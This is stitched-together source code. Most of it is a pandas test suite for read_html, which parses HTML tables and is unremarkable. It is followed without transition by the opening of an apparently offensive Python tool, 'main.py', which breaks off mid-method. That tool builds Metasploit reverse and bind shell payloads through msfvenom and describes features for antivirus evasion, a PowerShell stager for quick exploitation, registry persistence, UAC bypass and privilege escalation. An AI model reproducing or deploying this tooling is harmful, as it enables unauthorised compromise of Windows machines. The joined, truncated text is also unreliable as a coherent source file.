pytest.param('lxml', marks=pytest.mark.skipif(
not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml(object):
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath('io', 'data', 'spam.html')
self.spam_data_kwargs = {}
if PY3:
self.spam_data_kwargs['encoding'] = 'UTF-8'
self.banklist_data = datapath("io", "data", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@network
def test_banklist_url(self):
url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
df1 = self.read_html(url, 'First Federal Bank of Florida',
attrs={"id": 'table'})
df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
@network
def test_spam_url(self):
url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
df1 = self.read_html(url, '.*Water.*')
df2 = self.read_html(url, 'Unit')
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, '.*Florida.*',
attrs={'id': 'table'})
df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
attrs={'id': 'table'})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, '.*Water.*')
df2 = self.read_html(self.spam_data, 'Unit')
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == 'Proximates'
assert df1[0].columns[0] == 'Nutrient'
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
assert df.columns[0] == 'Proximates'
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_xrange(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=set([1, 2]))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=set([2, 1]))
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, '.*Water.*',
skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with tm.assert_raises_regex(TypeError, 'is not a valid type '
'for skipping rows'):
self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
def test_index(self):
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
@network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html('git://github.com', match='.*Water.*')
@network
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html('http://www.a23950sdfa908sd.com',
match='.*Water.*')
except ValueError as e:
assert str(e) == 'No tables found'
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
'First',
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with tm.assert_raises_regex(ValueError, 'No tables found'):
self.read_html(url, 'First Federal Bank of Florida',
attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
df = self._bank_data(header=[0, 1], skiprows=1,
tupleize_cols=True)[0]
assert isinstance(df.columns, Index)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile('Florida')),
attrs={'id': 'table'})
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
with tm.assert_raises_regex(ValueError,
r'\(you passed a negative value\)'):
self.read_html(self.spam_data, 'Water', skiprows=-1)
@network
def test_multiple_matches(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
assert len(dfs) > 1
@network
def test_python_docs_table(self):
url = 'https://docs.python.org/2/'
dfs = self.read_html(url, match='Python')
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(['Repo', 'What'])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "macau.html")
dfs = self.read_html(macau_data, index_col=0,
attrs={'class': 'style1'})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath('io', 'data', 'macau.html')
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html, )[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile(object):
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super(ErrorThread, self).run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
|
main.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import socket
import re
import subprocess
import struct
import sys
import blessed
import random
import SimpleHTTPServer
import SocketServer
import multiprocessing
from Crypto.Cipher import AES
import base64
import string
import glob
import readline
import time
import psexec
import urllib2
from collections import OrderedDict
import string
import asyncore
import ssl
import threading
import prompt_toolkit
from prompt_toolkit.contrib.completers import WordCompleter
import netifaces
t = blessed.Terminal()
helpDict = {
'1' : '- Generates a metasploit reverse tcp shell.',
'2' : '- Generates a metasploit reverse tcp meterpreter shell.',
'3' : '- Generates a metasploit bind tcp meterpreter shell.',
'4' : '- Generates a metasploit reverse HTTPS meterpreter shell.',
'5' : '- Generates a metasploit reverse meterpreter shell with DNS.',
'6' : '- Generates a custom payload from user input (shellcode)',
'stager' : '- Produces a small base64 encoded powershell one liner that can be used for metasploit payloads and the powershell menu.'\
' It is small enough to fit in a windows run prompt and can be used with a ducky for quick exploitation\n'\
'- After a connection has been made, you can select any metasploit payload and it will give you the option to execute the'\
' payload over the powershell stager(without touching disk) and therefore has improved AV evasion.\n'\
'- Stagers can be used in reverse (prefered) or bind TCP and traffic is encrypted.',
'sandbox' : '- Select anti sandboxing techniques for use in metasploit payloads and stager payloads.\n'\
'- Values in [] are default values and when generating a payload user input will be taken',
'persistence' : '- After payload executes, a registry key will be added and the powershell payload will'\
'be saved on the file system as $env:USERPROFILE/update.txt. Upon boot, the payload will execute.',
'uacbypass' : '- Will try to bypass UAC on users that run as local admin. If bypass successfull, two shells should return'\
' and one of them will be running as local administrator.',
'allchecks' : '- After meterpreter connection, AllChecks.ps1 will execute, giving the user posible ways to privilige escalate.',
'interface' : '- This menu allows you to select the default interface for WinPayloads to use for all network tasks',
'cleanup' : '- Will remove all .exe in the default payload directory',
'clients' : '- This is the client menu. You will only be able to access this after recieving a stager connection. '\
'- A client connection can be made from using the stager menu option',
'ps' : '- This is the powershell scripts menu, it can only be accessed after recieveing a stager connection.\n'\
'- Payloads in this menu will be directly executed over the stager connection.'
}
def sandboxChoose(choice):
from menu import sandboxMenuOptions, getAndRunSandboxMenu
if sandboxMenuOptions[choice]['availablemodules']:
sandboxMenuOptions[choice]['availablemodules'] = None
else:
sandboxMenuOptions[choice]['availablemodules'] = {str('ON'): ''}
return "clear"
def payloaddir():
return os.path.expanduser('~') + '/winpayloads'
def msfvenomGeneration(payload, ip, port):
p = subprocess.Popen(['msfvenom', '-p', payload, 'LHOST=' + str(ip), 'LPORT=' + str(port), '-f', 'python', '-e', 'x86/shikata_ga_nai'], bufsize=1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
LOADING = Spinner('Generating Shellcode')
while p.poll() == None:
LOADING.Update()
time.sleep(0.2)
print '\r',
sys.stdout.flush()
payload = p.stdout.read()
compPayload = re.findall(r'"(.*?)"', payload)
return ''.join(map(str, compPayload))
def getHelp(*helpItem):
helpItem = ''.join(helpItem)
if helpDict.has_key(helpItem):
return helpDict[helpItem]
else:
return t.bold_red + '[!] Enter a valid menu option to recieve help'
class HANDLER(SimpleHTTPServer.SimpleHTTPRequestHandler): #patching httpserver to shutup
def log_message(self, format, *args):
return
class InterfaceSelecta():
def __init__(self):
self.num = 0
self.interfaces = []
self.interface = None
self.defaultInterfaceName = None
try:
self.defaultInterfaceName = netifaces.gateways()['default'][netifaces.AF_INET][1]
except KeyError:
pass
for interface in netifaces.interfaces():
self.num += 1
if self.defaultInterfaceName == interface:
isdefault = True
else:
isdefault = False
try:
self.interfaces += [{'num': self.num, 'interface': interface, 'addr': netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr'], 'default': isdefault}]
except:
pass
for interface in self.interfaces:
if interface['default']:
self.interface = interface
if not self.interface:
if interface['interface'] == 'lo':
self.interface = interface
else:
self.interface = interface
def ChooseInterface(self, set=False):
if set:
for i in self.interfaces:
if self.interface == i:
currentinterface = t.bold_green + ' *'
else:
currentinterface = ''
print t.bold_yellow + str(i['num']) + ': ' + t.normal + i['addr'] + ' (' + i['interface'] + ')' + currentinterface
while True:
interinput = prompt_toolkit.prompt("Interface > ", completer=WordCompleter([str(x+1) for x in range(self.num-1)]), style=prompt_toolkit.styles.style_from_dict({prompt_toolkit.token.Token: '#FFCC66'}))
for i in self.interfaces:
if interinput == str(i['num']):
self.interface = i
return self.interface
return self.interface
class SHELLCODE(object):
@staticmethod
def windows_rev_shell(ip, port):
return msfvenomGeneration('windows/shell_reverse_tcp', ip, port)
@staticmethod
def windows_met_rev_shell(ip, port):
return msfvenomGeneration('windows/meterpreter/reverse_tcp', ip, port)
@staticmethod
def windows_met_bind_shell(ip, port):
return msfvenomGeneration('windows/meterpreter/bind_tcp', ip, port)
@staticmethod
def windows_met_rev_https_shell(ip, port):
